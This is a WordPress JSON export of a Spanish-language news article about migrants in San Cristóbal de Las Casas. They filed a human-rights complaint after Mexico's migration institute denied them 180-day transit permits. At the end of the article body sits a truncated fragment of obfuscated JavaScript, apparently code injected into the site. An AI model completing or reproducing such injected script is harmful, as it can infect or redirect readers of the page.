{"id":726,"date":"2022-03-18T04:50:54","date_gmt":"2022-03-18T04:50:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=726"},"modified":"2022-03-18T04:50:55","modified_gmt":"2022-03-18T04:50:55","slug":"migrantes-presentan-queja-por-violacion-a-sus-derechos-humanos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=726","title":{"rendered":"Migrantes presentan queja por violaci\u00f3n a sus derechos humanos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-3.21.02-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-727\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-3.21.02-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-3.21.02-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-3.21.02-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-3.21.02-PM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-17-at-3.21.02-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Migrantes de diferentes nacionalidades denunciaron la falta de atenci\u00f3n en la estaci\u00f3n del Instituto Nacional de Migraci\u00f3n (INM) adem\u00e1s que ya han interpuesto una queja ante Derechos Humanos, y p\u00fablicamente ante la prensa esta situaci\u00f3n.<\/p>\n\n\n\n<p>&nbsp;&#8220;Nos dijeron que nos iban a ayudar, pero no nos quieren atender en el Instituto Nacional de Migraci\u00f3n, nos trat\u00f3 mal, vinieron abogados asegur\u00f3 que era mentira lo que nos dijo y hab\u00edamos 60 personas para corroborar la informaci\u00f3n, esperamos la respuesta positiva para poder transitar, queremos el permiso de 180 d\u00edas, y una tarjeta verde, ya ingresaron 10 personas con el QR de migrantes y ya los van atender&#8221;, dijo.<\/p>\n\n\n\n<p>&nbsp;Lo anterior lo dijo uno de los Migrantes de diferentes nacionalidades que denunciaron falta de atenci\u00f3n en la estaci\u00f3n del Instituto Nacional de Migraci\u00f3n (INM), ya que les han negado el permiso de 180 d\u00edas para transitar libremente por el pa\u00eds, lo cual viola sus derechos humanos, ya que M\u00e9xico pertenece a la comunidad internacional y con esto est\u00e1n incumpliendo los acuerdos.<\/p>\n\n\n\n<p>&#8220;Pero creemos que es un solo instituto, no entendemos porque nos proporcionan informaci\u00f3n diferente. Lo \u00fanico que pedimos para solventar nuestra vida aqu\u00ed, porque salimos de nuestro pa\u00eds para una mejor vida, hemos dormido en el piso, pero hay muchos mexicanos que nos han ayudado, nos han dado refugios cat\u00f3licos pero fuera de eso no hemos recibido nada&#8221;, a\u00f1adi\u00f3.<\/p>\n\n\n\n<p>&#8220;Nosotros venimos de Venezuela, pasamos a Tapachula, Ciudad Hidalgo y llegamos ac\u00e1 a San Crist\u00f3bal de Las Casas, nos encontramos nicarag\u00fcenses, cubanos, haitianos, guatemaltecos, somos unos 60 que no nos quieren dar el permiso para poder transitar&#8221;, abund\u00f3.<\/p>\n\n\n\n<p>Y es argumentaron que&nbsp; se trasladaron de Ciudad Hidalgo, con un permiso de migraci\u00f3n &#8220;y aqu\u00ed nos dicen que no es v\u00e1lido, nosotros personalmente pensamos que si no hubiera sido v\u00e1lido no nos hubi\u00e9ramos podido trasladar para ac\u00e1, no tuvimos problemas en los retenes, entonces ahora no podemos hacer nada, y nos dicen que si nos movemos ser\u00e1 bajo nuestro riesgo&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Migrantes de diferentes nacionalidades denunciaron la falta de atenci\u00f3n en la estaci\u00f3n del Instituto Nacional de Migraci\u00f3n (INM) adem\u00e1s que ya han interpuesto una queja ante Derechos Humanos, y p\u00fablicamente ante la prensa esta situaci\u00f3n. &nbsp;&#8220;Nos dijeron que nos iban a ayudar, pero no nos quieren atender en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":727,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-726","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/726","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=726"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/726\/revisions"}],"predecessor-version":[{"id":728,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/726\/revisions\/728"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/727"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=726"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=726"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=726"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}